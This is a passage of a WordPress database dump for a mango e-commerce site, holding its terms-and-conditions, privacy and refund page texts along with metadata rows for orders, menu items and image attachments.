you.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p><strong>Indemnity:</strong>&nbsp;You agree to defend, indemnify and hold harmless HDRSPL, its employees, directors, officers, agents and their successors and assigns from and against any and all claims, liabilities, damages, losses, costs and expenses, including attorney’s fees, caused by or arising out of claims based upon your actions or inactions, which may result in any loss or liability to HDRSPL or any third party including but not limited to breach of any warranties, representations or undertakings or in relation to the non-fulfilment of any of your obligations under this User Agreement or arising out of the your violation of any applicable laws, regulations including but not limited to Intellectual Property Rights, payment of statutory dues and taxes, claim of libel, defamation, violation of rights of privacy or publicity, loss of service by other subscribers and infringement of intellectual property or other rights. This clause shall survive the expiry or termination of this User Agreement.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p><strong>Termination:</strong>&nbsp;This User Agreement is effective unless and until terminated by either you or HDRSPL. You may terminate this User Agreement at any time, provided that you discontinue any further use of this Site. HDRSPL may terminate this User Agreement at any time and may do so immediately without notice, and accordingly deny you access to the Site, Such termination will be without any liability to HDRSPL. Upon any termination of the User Agreement by either you or HDRSPL, you must promptly destroy all materials downloaded or otherwise obtained from this Site, as well as all copies of such materials, whether made under the User Agreement or otherwise. HDRSPL’s right to any Comments shall survive any termination of this User Agreement. Any such termination of the User Agreement shall not cancel your obligation to pay for the product already ordered from the Website or affect any liability that may have arisen under the User Agreement.</p>\n<!-- /wp:paragraph -->','Terms And Conditions','','publish','closed','closed','','terms-and-conditions','','','2022-01-24 10:37:33','2022-01-24 10:37:33','',0,'https://www.mangomitra.in/?page_id=564',0,'page','',0),(565,1,'2022-01-24 10:37:32','2022-01-24 10:37:32','<!-- wp:paragraph -->\n<p>Home Direct Retail Solutions Pvt Ltd (“HDRSPL”) is the licensed owner of the brand homedirect.in and the website homedirect.in (”The Site”). As a visitor to the Site/ Customer you are advised to please read the Terms &amp; Conditions carefully. By accessing the services provided by the Site you agree to the terms provided in this Terms &amp; Conditions document.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p><strong>Personal Information:</strong>&nbsp;As part of the registration process on the Site, HDRSPL may collect the following personally identifiable information about you: Name including first and last name, alternate email address, mobile phone number and contact details, Postal code, Demographic profile (like your age, gender, occupation, education, address etc.) and information about the pages on the site you visit/access, the links you click on the site, the number of times you access the page and any such browsing information.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p><strong>Eligibility:</strong>&nbsp;Services of the Site would be available to only select geographies in India. Persons who are “incompetent to contract” within the meaning of the Indian Contract Act, 1872 including un-discharged insolvents etc. are not eligible to use the Site. If you are a minor i.e. under the age of 18 years but at least 13 years of age you may use the Site only under the supervision of a parent or legal guardian who agrees to be bound by these Terms of Use. If your age is below 18 years your parents or legal guardians can transact on behalf of you if they are registered users. You are prohibited from purchasing any material which is for adult consumption and the sale of which to minors is prohibited</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p><strong>License &amp; Site access:</strong>&nbsp;HDRSPL grants you a limited sub-license to access and make personal use of this site and not to download (other than page caching) or modify it, or any portion of it, except with express written consent of HDRSPL. This license does not include any resale or commercial use of this site or its contents; any collection and use of any product listings, descriptions, or prices; any derivative use of this site or its contents; any downloading or copying of account information for the benefit of another merchant; or any use of data mining, robots, or similar data gathering and extraction tools. This site or any portion of this site may not be reproduced, duplicated, copied, sold, resold, visited, or otherwise exploited for any commercial purpose without express written consent of HDRSPL. You may not frame or utilize framing techniques to enclose any trademark, logo, or other proprietary information (including images, text, page layout, or form) of the Site or of HDRSPL and its affiliates without express written consent. You may not use any meta tags or any other “hidden text” utilizing the Site’s or HDRSPL’s name or trademarks without the express written consent of HDRSPL. Any unauthorized use terminates the permission or license granted by HDRSPL.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p><strong>Account &amp; Registration Obligations:</strong>&nbsp;All shoppers have to register and login for placing orders on the Site. You have to keep your account and registration details current and correct for communications related to your purchases from the site. By agreeing to the terms and conditions, the shopper agrees to receive promotional communication and newsletters upon registration. The customer can opt out either by unsubscribing in “My Account” or by contacting the customer service.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p><strong>Pricing:</strong>&nbsp;All the products listed on the Site will be sold at MRP unless otherwise specified. The prices mentioned at the time of ordering will be the prices charged on the date of the delivery. Although prices of most of the products do not fluctuate on a daily basis but some of the commodities and fresh food prices do change on a daily basis. In case the prices are higher or lower on the date of delivery not additional charges will be collected or refunded as the case may be at the time of the delivery of the order.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p><strong>Cancellation by Site / Customer:</strong>&nbsp;You as a customer can cancel your order anytime up to the cut-off time of the slot for which you have placed an order by calling our customer service. In such a case we will refund any payments already made by you for the order. If we suspect any fraudulent transaction by any customer or any transaction which defies the terms &amp; conditions of using the website, we at our sole discretion could cancel such orders. We will maintain a negative list of all fraudulent transactions and customers and would deny access to them or cancel any orders placed by them.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:heading {\"level\":3} -->\n<h3>You Agree and Confirm</h3>\n<!-- /wp:heading -->\n\n<!-- wp:list -->\n<ul><li>That in the event that a non-delivery occurs on account of a mistake by you (i.e. wrong name or address or any other wrong information) any extra cost incurred by HDRSPL for redelivery shall be claimed from you.</li><li>That you will use the services provided by the Site, its affiliates, consultants and contracted companies, for lawful purposes only and comply with all applicable laws and regulations while using and transacting on the Site.</li><li>You will provide authentic and true information in all instances where such information is requested of you. HDRSPL reserves the right to confirm and validate the information and other details provided by you at any point of time. If upon confirmation your details are found not to be true (wholly or partly), it has the right in its sole discretion to reject the registration and debar you from using the Services and / or other affiliated websites without prior intimation whatsoever.</li><li>You authorise HDRSPL to contact you for any transactional purposes related to your order/account.</li><li>That you are accessing the services available on this Site and transacting at your sole risk and are using your best and prudent judgment before entering into any transaction through this Site.</li><li>That the address at which delivery of the product ordered by you is to be made will be correct and proper in all respects.</li><li>That before placing an order you will check the product description carefully. By placing an order for a product you agree to be bound by the conditions of sale included in the item’s description.</li></ul>\n<!-- /wp:list -->\n\n<!-- wp:heading {\"level\":3} -->\n<h3>You may not use the Site for any of the following purposes:</h3>\n<!-- /wp:heading -->\n\n<!-- wp:list -->\n<ul><li>Disseminating any unlawful, harassing, libellous, abusive, threatening, harmful, vulgar, obscene, or otherwise objectionable material.</li><li>Transmitting material that encourages conduct that constitutes a criminal offence or results in civil liability or otherwise breaches any relevant laws, regulations or code of practice.</li><li>Gaining unauthorized access to other computer systems.</li><li>Interfering with any other person’s use or enjoyment of the Site.</li><li>Breaching any applicable laws;</li><li>Interfering or disrupting networks or web sites connected to the Site.&nbsp;</li><li>Making, transmitting or storing electronic copies of materials protected by copyright without the permission of the owner.</li></ul>\n<!-- /wp:list -->\n\n<!-- wp:paragraph -->\n<p><strong>Colours:</strong>&nbsp;We have made every effort to display the colours of our products that appear on the Website as accurately as possible. However, as the actual colours you see will depend on your monitor, we cannot guarantee that your monitor’s display of any colour will be accurate.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p><strong>Modification of Terms &amp; Conditions of Service:</strong>&nbsp;HDRSPL may at any time modify the Terms &amp; Conditions of Use of the Website without any prior notification to you. You can access the latest version of these Terms &amp; Conditions at any given time on the Site. You should regularly review the Terms &amp; Conditions on the Site. In the event the modified Terms &amp; Conditions is not acceptable to you, you should discontinue using the Service. However, if you continue to use the Service you shall be deemed to have agreed to accept and abide by the modified Terms &amp; Conditions of Use of this Site.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p><strong>Governing Law and Jurisdiction:</strong>&nbsp;This User Agreement shall be construed in accordance with the applicable laws of India. The Courts at Bangalore shall have exclusive jurisdiction in any proceedings arising out of this agreement. Any dispute or difference either in interpretation or otherwise, of any terms of this User Agreement between the parties hereto, the same shall be referred to an independent arbitrator who will be appointed by HDRSPL and his decision shall be final and binding on the parties hereto. The above arbitration shall be in accordance with the Arbitration and Conciliation Act, 1996 as amended from time to time. The arbitration shall be held in Bangalore. The High Court of judicature at Bangalore alone shall have the jurisdiction and the Laws of India shall apply.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p><strong>Reviews, Feedback, Submissions:</strong>&nbsp;All reviews, comments, feedback, postcards, suggestions, ideas, and other submissions disclosed, submitted or offered to the Site on or by this Site or otherwise disclosed, submitted or offered in connection with your use of this Site (collectively, the “Comments”) shall be and remain the property of HDRSPL. Such disclosure, submission or offer of any Comments shall constitute an assignment to HDRSPL of all worldwide rights, titles and interests in all copyrights and other intellectual properties in the Comments. Thus, HDRSPL owns exclusively all such rights, titles and interests and shall not be limited in any way in its use, commercial or otherwise, of any Comments. HDRSPL will be entitled to use, reproduce, disclose, modify, adapt, create derivative works from, publish, display and distribute any Comments you submit for any purpose whatsoever, without restriction and without compensating you in any way. HDRSPL is and shall be under no obligation (1) to maintain any Comments in confidence; (2) to pay you any compensation for any Comments; or (3) to respond to any Comments. You agree that any Comments submitted by you to the Site will not violate this policy or any right of any third party, including copyright, trademark, privacy or other personal or proprietary right(s), and will not cause injury to any person or entity. You further agree that no Comments submitted by you to the Website will be or contain libelous or otherwise unlawful, threatening, abusive or obscene material, or contain software viruses, political campaigning, commercial solicitation, chain letters, mass mailings or any form of “spam”. Please note all reviews submitted by customers are subject to checks and moderation by our content Team. HDRSPL reserves the rights to moderate as well as publish/not publish the reviews. HDRSPL reserves the rights to solicit or withhold reviews and ratings with no liability. HDRSPL reserve the right to accept, reject, moderate, monitor &amp; edit or remove any comment. You grant HDRSPL the right to use the name that you submit in connection with any Comments. You agree not to use a false email address, impersonate any person or entity, or otherwise mislead as to the origin of any Comments you submit. You are and shall remain solely responsible for the content of any Comments you make, and you agree to indemnify HDRSPL and its affiliates for all claims resulting from any Comments you submit. HDRSPL and its affiliates take no responsibility and assume no liability for any Comments submitted by you or any third party.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p><strong>Copyright &amp; Trademark:</strong>&nbsp;HDRSPL, its suppliers and licensors expressly reserve all intellectual property rights in all text, programs, products, processes, technology, content and other materials, which appear on this Site. Access to this Website does not confer and shall not be considered as conferring upon anyone any license under any of HDRSPL or any third party’s intellectual property rights. All rights, including copyright, in this website are owned by or licensed to HDRSPL. Any use of this website or its contents, including copying or storing it or them in whole or part, other than for your own personal, non-commercial use is prohibited without the permission of HDRSPL. You may not modify, distribute or re-post anything on this website for any purpose. The names and logos and all related product and service names, design marks and slogans are the trademarks or service marks of HDRSPL, its affiliates, its partners or its suppliers. All other marks are the property of their respective companies. No trademark or service mark license is granted in connection with the materials contained on this Site. Access to this Site does not authorize anyone to use any name, logo or mark in any manner. References on this Site to any names, marks, products or services of third parties or hypertext links to third party sites or information are provided solely as a convenience to you and do not in any way constitute or imply HDRSPL endorsement, sponsorship or recommendation of the third party, information, product or service. HDRSPL is not responsible for the content of any third party sites and does not make any representations regarding the content or accuracy of material on such sites. If you decide to link to any such third party websites, you do so entirely at your own risk. All materials, including images, text, illustrations, designs, icons, photographs, programs, music clips or downloads, video clips and written and other materials that are part of this Website (collectively, the “Contents”) are intended solely for personal, non-commercial use. You may download or copy the Contents and other downloadable materials displayed on the Website for your personal use only. No right, title or interest in any downloaded materials or software is transferred to you as a result of any such downloading or copying. You may not reproduce (except as noted above), publish, transmit, distribute, display, modify, create derivative works from, sell or participate in any sale of or exploit in any way, in whole or in part, any of the Contents, the Website or any related software. All software used on this Website is the property of HDRSPL or its licensees and suppliers and protected by Indian and international copyright laws. The Contents and software on this Website may be used only as a shopping resource. Any other use, including the reproduction, modification, distribution, transmission, republication, display, or performance, of the Contents on this Website is strictly prohibited. Unless otherwise noted, all Contents are copyrights, trademarks, trade dress and/or other intellectual property owned, controlled or licensed by HDRSPL, one of its affiliates or by third parties who have licensed their materials to HDRSPL and are protected by Indian and international copyright laws. The compilation (meaning the collection, arrangement, and assembly) of all Contents on this Website is the exclusive property of HDRSPL and is also protected by Indian and international copyright laws.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p><strong>Objectionable Material:</strong>&nbsp;You understand that by using this Site or any services provided on the Site, you may encounter Content that may be deemed by some to be offensive, indecent, or objectionable, which Content may or may not be identified as such. You agree to use the Site and any service at your sole risk and that to the fullest extent permitted under applicable law, HDRSPL and its affiliates shall have no liability to you for Content that may be deemed offensive, indecent, or objectionable to you.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p><strong>Indemnity:</strong>&nbsp;You agree to defend, indemnify and hold harmless HDRSPL, its employees, directors, officers, agents and their successors and assigns from and against any and all claims, liabilities, damages, losses, costs and expenses, including attorney’s fees, caused by or arising out of claims based upon your actions or inactions, which may result in any loss or liability to HDRSPL or any third party including but not limited to breach of any warranties, representations or undertakings or in relation to the non-fulfilment of any of your obligations under this User Agreement or arising out of the your violation of any applicable laws, regulations including but not limited to Intellectual Property Rights, payment of statutory dues and taxes, claim of libel, defamation, violation of rights of privacy or publicity, loss of service by other subscribers and infringement of intellectual property or other rights. This clause shall survive the expiry or termination of this User Agreement.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p><strong>Termination:</strong>&nbsp;This User Agreement is effective unless and until terminated by either you or HDRSPL. You may terminate this User Agreement at any time, provided that you discontinue any further use of this Site. HDRSPL may terminate this User Agreement at any time and may do so immediately without notice, and accordingly deny you access to the Site, Such termination will be without any liability to HDRSPL. Upon any termination of the User Agreement by either you or HDRSPL, you must promptly destroy all materials downloaded or otherwise obtained from this Site, as well as all copies of such materials, whether made under the User Agreement or otherwise. HDRSPL’s right to any Comments shall survive any termination of this User Agreement. Any such termination of the User Agreement shall not cancel your obligation to pay for the product already ordered from the Website or affect any liability that may have arisen under the User Agreement.</p>\n<!-- /wp:paragraph -->','Terms And Conditions','','inherit','closed','closed','','564-revision-v1','','','2022-01-24 10:37:32','2022-01-24 10:37:32','',564,'https://www.mangomitra.in/?p=565',0,'revision','',0),(566,1,'2022-01-24 10:38:03','2022-01-24 10:38:03','<!-- wp:paragraph -->\n<p><strong>Personal Information:&nbsp;</strong>As part of the registration process on the Site, HDRSPL may collect the following personally identifiable information about you: Name including first and last name, alternate email address, mobile phone number and contact details, Postal code, Demographic profile (like your age, gender, occupation, education, address etc.) and information about the pages on the site you visit/access, the links you click on the site, the number of times you access the page and any such browsing information.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p><strong>Account &amp; Registration Obligations:</strong>&nbsp;All shoppers have to register and login for placing orders on the Site. You have to keep your account and registration details current and correct for communications related to your purchases from the site. By agreeing to the terms and conditions, the shopper agrees to receive promotional communication and newsletters upon registration. The customer can opt out either by unsubscribing in “My Account” or by contacting the customer service.</p>\n<!-- /wp:paragraph -->','Privacy Policy','','publish','closed','closed','','privacy-policy-2','','','2022-01-24 10:38:04','2022-01-24 10:38:04','',0,'https://www.mangomitra.in/?page_id=566',0,'page','',0),(567,1,'2022-01-24 10:38:03','2022-01-24 10:38:03','<!-- wp:paragraph -->\n<p><strong>Personal Information:&nbsp;</strong>As part of the registration process on the Site, HDRSPL may collect the following personally identifiable information about you: Name including first and last name, alternate email address, mobile phone number and contact details, Postal code, Demographic profile (like your age, gender, occupation, education, address etc.) and information about the pages on the site you visit/access, the links you click on the site, the number of times you access the page and any such browsing information.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p><strong>Account &amp; Registration Obligations:</strong>&nbsp;All shoppers have to register and login for placing orders on the Site. You have to keep your account and registration details current and correct for communications related to your purchases from the site. By agreeing to the terms and conditions, the shopper agrees to receive promotional communication and newsletters upon registration. The customer can opt out either by unsubscribing in “My Account” or by contacting the customer service.</p>\n<!-- /wp:paragraph -->','Privacy Policy','','inherit','closed','closed','','566-revision-v1','','','2022-01-24 10:38:03','2022-01-24 10:38:03','',566,'https://www.mangomitra.in/?p=567',0,'revision','',0),(568,1,'2022-01-24 10:39:02','2022-01-24 10:39:02','<!-- wp:paragraph -->\n<p><strong>By Site / Customer:</strong> You as a customer can cancel your order anytime up to the cut-off time of the slot for which you have placed an order by calling our customer service. In such a case we will refund any payments already made by you for the order. If we suspect any fraudulent transaction by any customer or any transaction which defies the terms &amp; conditions of using the website, we at our sole discretion could cancel such orders. We will maintain a negative list of all fraudulent transactions and customers and would deny access to them or cancel any orders placed by them.</p>\n<!-- /wp:paragraph -->','Refunds/Cancellation','','publish','closed','closed','','refunds-cancellation','','','2022-01-24 10:39:03','2022-01-24 10:39:03','',0,'https://www.mangomitra.in/?page_id=568',0,'page','',0),(569,1,'2022-01-24 10:39:02','2022-01-24 10:39:02','<!-- wp:paragraph -->\n<p><strong>By Site / Customer:</strong> You as a customer can cancel your order anytime up to the cut-off time of the slot for which you have placed an order by calling our customer service. In such a case we will refund any payments already made by you for the order. If we suspect any fraudulent transaction by any customer or any transaction which defies the terms &amp; conditions of using the website, we at our sole discretion could cancel such orders. We will maintain a negative list of all fraudulent transactions and customers and would deny access to them or cancel any orders placed by them.</p>\n<!-- /wp:paragraph -->','Refunds/Cancellation','','inherit','closed','closed','','568-revision-v1','','','2022-01-24 10:39:02','2022-01-24 10:39:02','',568,'https://www.mangomitra.in/?p=569',0,'revision','',0),(570,1,'2022-01-24 10:41:23','2022-01-24 10:41:23',' ','','','publish','closed','closed','','570','','','2022-01-24 10:41:23','2022-01-24 10:41:23','',0,'https://www.mangomitra.in/?p=570',5,'nav_menu_item','',0),(571,1,'2022-01-24 10:41:23','2022-01-24 10:41:23',' ','','','publish','closed','closed','','571','','','2022-01-24 10:41:23','2022-01-24 10:41:23','',0,'https://www.mangomitra.in/?p=571',4,'nav_menu_item','',0),(572,1,'2022-01-24 10:41:23','2022-01-24 10:41:23',' ','','','publish','closed','closed','','572','','','2022-01-24 10:41:23','2022-01-24 10:41:23','',0,'https://www.mangomitra.in/?p=572',3,'nav_menu_item','',0),(574,1,'2022-01-24 10:41:23','2022-01-24 10:41:23',' ','','','publish','closed','closed','','574','','','2022-01-24 10:41:23','2022-01-24 10:41:23','',0,'https://www.mangomitra.in/?p=574',2,'nav_menu_item','',0),(580,1,'2022-01-25 03:56:26','2022-01-25 03:56:26','','Order &ndash; January 25, 2022 @ 03:56 AM','','wc-processing','open','closed','wc_order_HBkR3Bjro4x3p','order-jan-25-2022-0356-am','','','2022-01-25 04:00:35','2022-01-25 04:00:35','',0,'https://www.mangomitra.in/?post_type=shop_order&#038;p=580',0,'shop_order','',3),(581,4,'2022-01-25 03:56:26','2022-01-25 03:56:26','','Order &ndash; January 25, 2022 @ 03:56 AM','','wc-processing','open','closed','wcmp_order_61ef74eaac4a5','vendor-order-january-25-2022-0356-am','','','2022-01-25 04:00:35','2022-01-25 04:00:35','',580,'https://www.mangomitra.in/?post_type=shop_order&#038;p=581',0,'shop_order','',1),(582,4,'2022-01-25 03:56:26','2022-01-25 03:56:26','','Commission - January 25, 2022 @ 03:56 AM','','private','closed','closed','','commission-january-25-2022-0356-am','','','2022-01-25 03:56:26','2022-01-25 03:56:26','',0,'https://www.mangomitra.in/?post_type=dc_commission&p=582',0,'dc_commission','',1),(584,1,'2022-01-25 05:30:04','2022-01-25 05:30:04','','Default Kit','','publish','closed','closed','','default-kit','','','2022-09-19 10:02:52','2022-09-19 04:32:52','',0,'https://www.mangomitra.in/?p=584',0,'elementor_library','',0),(591,2,'2022-01-25 06:04:14','2022-01-25 06:04:14','','home-02','','inherit','open','closed','','home-02','','','2022-01-25 06:04:14','2022-01-25 06:04:14','',0,'https://www.mangomitra.in/wp-content/uploads/2022/01/home-02.png',0,'attachment','image/png',0),(592,2,'2022-01-25 06:05:00','2022-01-25 06:05:00','','11','','inherit','open','closed','','11-2','','','2022-01-25 06:05:00','2022-01-25 06:05:00','',0,'https://www.mangomitra.in/wp-content/uploads/2022/01/11-1.png',0,'attachment','image/png',0),(593,2,'2022-01-25 06:05:27','2022-01-25 06:05:27','','11','','inherit','open','closed','','11-3','','','2022-01-25 06:05:27','2022-01-25 06:05:27','',0,'https://www.mangomitra.in/wp-content/uploads/2022/01/11-2.png',0,'attachment','image/png',0),(594,2,'2022-01-25 06:06:00','2022-01-25 06:06:00','','14','','inherit','open','closed','','14-2','','','2022-01-25 06:06:00','2022-01-25 06:06:00','',0,'https://www.mangomitra.in/wp-content/uploads/2022/01/14-1.png',0,'attachment','image/png',0),(597,2,'2022-01-25 06:22:04','2022-01-25 06:22:04','','11','','inherit','open','closed','','11-4','','','2022-01-25 06:22:04','2022-01-25 06:22:04','',0,'https://www.mangomitra.in/wp-content/uploads/2022/01/11-3.png',0,'attachment','image/png',0),(598,2,'2022-01-25 06:26:35','2022-01-25 06:26:35','','14','','inherit','open','closed','','14-3','','','2022-01-25 06:26:35','2022-01-25 06:26:35','',0,'https://www.mangomitra.in/wp-content/uploads/2022/01/14-2.png',0,'attachment','image/png',0),(602,1,'2022-01-25 11:39:08','2022-01-25 11:39:08','','images (3)_CnyokaDvJmG1xu','','inherit','open','closed','','images-3_cnyokadvjmg1xu','','','2022-01-25 11:39:08','2022-01-25 11:39:08','',0,'https://www.mangomitra.in/wp-content/uploads/2022/01/images-3_CnyokaDvJmG1xu.png',0,'attachment','image/png',0),(613,1,'2022-01-25 12:07:01','2022-01-25 12:07:01','','79969457-homemade-mango-jam-with-fresh-fruits-and-leaves-of-mango-on-a-white-marble-caramelized-mango-jam-in-','','inherit','open','closed','','79969457-homemade-mango-jam-with-fresh-fruits-and-leaves-of-mango-on-a-white-marble-caramelized-mango-jam-in','','','2022-01-28 10:17:25','2022-01-28 10:17:25','',0,'https://www.mangomitra.in/wp-content/uploads/2022/01/79969457-homemade-mango-jam-with-fresh-fruits-and-leaves-of-mango-on-a-white-marble-caramelized-mango-jam-in-.webp',0,'attachment','image/webp',0),(614,1,'2022-01-25 12:08:32','2022-01-25 12:08:32','','images','','inherit','open','closed','','images','','','2022-01-25 12:08:32','2022-01-25 12:08:32','',0,'https://www.mangomitra.in/wp-content/uploads/2022/01/images.jpg',0,'attachment','image/jpeg',0),(616,1,'2022-01-25 12:24:08','2022-01-25 12:24:08','','images (1)','','inherit','open','closed','','images-1','','','2022-01-25 12:29:23','2022-01-25 12:29:23','',0,'https://www.mangomitra.in/wp-content/uploads/2022/01/images-1.jpg',0,'attachment','image/jpeg',0),(618,1,'2022-01-25 12:27:19','2022-01-25 12:27:19','','home-02','','inherit','open','closed','','home-02-2','','','2022-01-25 12:27:19','2022-01-25 12:27:19','',0,'https://www.mangomitra.in/wp-content/uploads/2022/01/home-02-1.png',0,'attachment','image/png',0),(619,1,'2022-01-25 12:30:59','2022-01-25 12:30:59','','home-0111','','inherit','open','closed','','home-0111','','','2022-01-25 12:30:59','2022-01-25 12:30:59','',0,'https://www.mangomitra.in/wp-content/uploads/2022/01/home-0111.jpg',0,'attachment','image/jpeg',0),(620,1,'2022-01-25 12:33:11','2022-01-25 12:33:11','','169d48431c0c3a65dbf43d3a8a428774','','inherit','open','closed','','169d48431c0c3a65dbf43d3a8a428774','','','2022-01-25 12:33:11','2022-01-25 12:33:11','',0,'https://www.mangomitra.in/wp-content/uploads/2022/01/169d48431c0c3a65dbf43d3a8a428774.jpg',0,'attachment','image/jpeg',0),(621,1,'2022-01-25 12:38:25','2022-01-25 12:38:25','','images (1)2','','inherit','open','closed','','images-12','','','2022-01-25 12:38:25','2022-01-25 12:38:25','',0,'https://www.mangomitra.in/wp-content/uploads/2022/01/images-12.png',0,'attachment','image/png',0),(623,1,'2022-01-25 12:40:43','2022-01-25 12:40:43','','4r','','inherit','open','closed','','4r','','','2022-01-25 12:40:43','2022-01-25 12:40:43','',0,'https://www.mangomitra.in/wp-content/uploads/2022/01/4r.png',0,'attachment','image/png',0),(633,1,'2022-01-28 10:06:30','2022-01-28 10:06:30','[wc_frontend_manager]','Store Manager','','publish','closed','closed','','store-manager','','','2022-02-17 16:23:21','2022-02-17 10:53:21','',0,'https://www.mangomitra.in/store-manager/',0,'page','',0),(634,1,'2022-01-28 10:06:32','2022-01-28 10:06:32','[wc_frontend_manager]','Store Manager','','inherit','closed','closed','','633-revision-v1','','','2022-01-28 10:06:32','2022-01-28 10:06:32','',633,'https://www.mangomitra.in/?p=634',0,'revision','',0),(635,1,'2022-01-28 10:07:47','2022-01-28 10:07:47','[wcfm_vendor_membership]','Vendor Membership','','publish','closed','closed','','vendor-membership','','','2022-02-17 16:26:48','2022-02-17 10:56:48','',0,'https://www.mangomitra.in/vendor-membership/',0,'page','',0),(636,1,'2022-01-28 10:07:47','2022-01-28 10:07:47','[wcfm_vendor_registration]','Vendor Registration','','publish','closed','closed','','vendor-register','','','2022-02-17 16:26:48','2022-02-17 10:56:48','',0,'https://www.mangomitra.in/vendor-register/',0,'page','',0),(641,1,'2022-01-28 11:44:12','2022-01-28 11:44:12','{\"version\": 2, \"isGlobalStylesUserThemeJSON\": true }','Custom Styles','','publish','closed','closed','','wp-global-styles-open-shop','','','2022-01-28 11:44:12','2022-01-28 11:44:12','',0,'https://www.mangomitra.in/2022/01/28/wp-global-styles-open-shop/',0,'wp_global_styles','',0),(644,1,'2022-01-28 12:08:19','2022-01-28 12:08:19','','Default','','publish','closed','closed','','default','','','2022-01-28 12:08:19','2022-01-28 12:08:19','',0,'https://www.mangomitra.in/?p=644',0,'wpse_profiles','',0),(648,1,'2022-01-31 05:03:16','2022-01-31 05:03:16',' ','','','publish','closed','closed','','648','','','2022-01-31 05:03:16','2022-01-31 05:03:16','',0,'https://www.mangomitra.in/2022/01/31/648/',7,'nav_menu_item','',0),(650,1,'2022-01-31 05:05:32','2022-01-31 05:05:32','','Default Kit','','inherit','closed','closed','','584-revision-v1','','','2022-01-31 05:05:32','2022-01-31 05:05:32','',584,'https://www.mangomitra.in/?p=650',0,'revision','',0),(654,1,'2022-01-31 16:01:44','2022-01-31 10:31:44','','Order &ndash; January 31, 2022 @ 04:01 PM','','wc-cancel-request','open','closed','wc_order_CPL3v7aycSK9c','order-jan-31-2022-1031-am','','','2022-02-25 11:41:25','2022-02-25 06:11:25','',0,'https://mangomitra.in/?post_type=shop_order&#038;p=654',0,'shop_order','',4),(659,1,'2022-01-31 17:30:50','2022-01-31 12:00:50','https://mangomitra.in/wp-content/uploads/2022/01/cropped-1-02.png','cropped-1-02.png','','inherit','open','closed','','cropped-1-02-png','','','2022-01-31 17:30:50','2022-01-31 12:00:50','',0,'https://mangomitra.in/wp-content/uploads/2022/01/cropped-1-02.png',0,'attachment','image/png',0),(667,1,'2022-01-31 17:42:27','2022-01-31 12:12:27','','a','','publish','open','open','','a','','','2022-01-31 17:42:27','2022-01-31 12:12:27','',0,'https://mangomitra.in/?post_type=e-landing-page&#038;p=667',0,'e-landing-page','',0),(668,1,'2022-01-31 17:42:27','2022-01-31 12:12:27','','a','','inherit','closed','closed','','667-revision-v1','','','2022-01-31 17:42:27','2022-01-31 12:12:27','',667,'https://mangomitra.in/?p=668',0,'revision','',0),(669,1,'2022-02-01 12:28:05','2022-02-01 06:58:05','','banner','','inherit','open','closed','','banner','','','2022-02-01 12:28:05','2022-02-01 06:58:05','',0,'https://mangomitra.in/wp-content/uploads/2022/02/banner.png',0,'attachment','image/png',0),(671,1,'2022-02-01 14:40:08','2022-02-01 09:10:08','','222','','inherit','open','closed','','222','','','2022-02-01 14:40:08','2022-02-01 09:10:08','',0,'https://mangomitra.in/wp-content/uploads/2022/02/222.png',0,'attachment','image/png',0),(674,1,'2022-02-02 12:35:02','2022-02-02 07:05:02','','banner [Recovered]-04','','inherit','open','closed','','banner-recovered-04','','','2022-02-02 12:35:02','2022-02-02 07:05:02','',0,'https://mangomitra.in/wp-content/uploads/2022/02/banner-Recovered-04.jpg',0,'attachment','image/jpeg',0),(675,1,'2022-02-02 12:35:12','2022-02-02 07:05:12','','banner [Recovered]-03','','inherit','open','closed','','banner-recovered-03','','','2022-02-02 12:35:12','2022-02-02 07:05:12','',0,'https://mangomitra.in/wp-content/uploads/2022/02/banner-Recovered-03.jpg',0,'attachment','image/jpeg',0),(676,1,'2022-02-02 12:35:17','2022-02-02 07:05:17','','banner [Recovered]-01','','inherit','open','closed','','banner-recovered-01','','','2022-02-02 12:35:17','2022-02-02 07:05:17','',0,'https://mangomitra.in/wp-content/uploads/2022/02/banner-Recovered-01.jpg',0,'attachment','image/jpeg',0),(678,1,'2022-02-02 12:45:41','2022-02-02 07:15:41','','banner [Recovered]-01','','inherit','open','closed','','banner-recovered-01-2','','','2022-02-02 12:45:41','2022-02-02 07:15:41','',0,'https://mangomitra.in/wp-content/uploads/2022/02/banner-Recovered-01.png',0,'attachment','image/png',0),(682,1,'2022-02-02 13:37:07','2022-02-02 08:07:07','<!-- wp:image {\"id\":756,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"https://mangomitra.in/wp-content/uploads/2022/02/calender-02-1024x479.png\" alt=\"\" class=\"wp-image-756\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":754,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"https://mangomitra.in/wp-content/uploads/2022/02/calender-03-4-1024x479.png\" alt=\"\" class=\"wp-image-754\"/></figure>\n<!-- /wp:image -->','Mango Calendar','','publish','closed','closed','','calender','','','2022-02-04 17:40:12','2022-02-04 12:10:12','',0,'https://mangomitra.in/?page_id=682',0,'page','',0),(684,1,'2022-02-02 13:37:07','2022-02-02 08:07:07','','calender','','inherit','closed','closed','','682-revision-v1','','','2022-02-02 13:37:07','2022-02-02 08:07:07','',682,'https://mangomitra.in/?p=684',0,'revision','',0),(685,1,'2022-02-02 13:37:07','2022-02-02 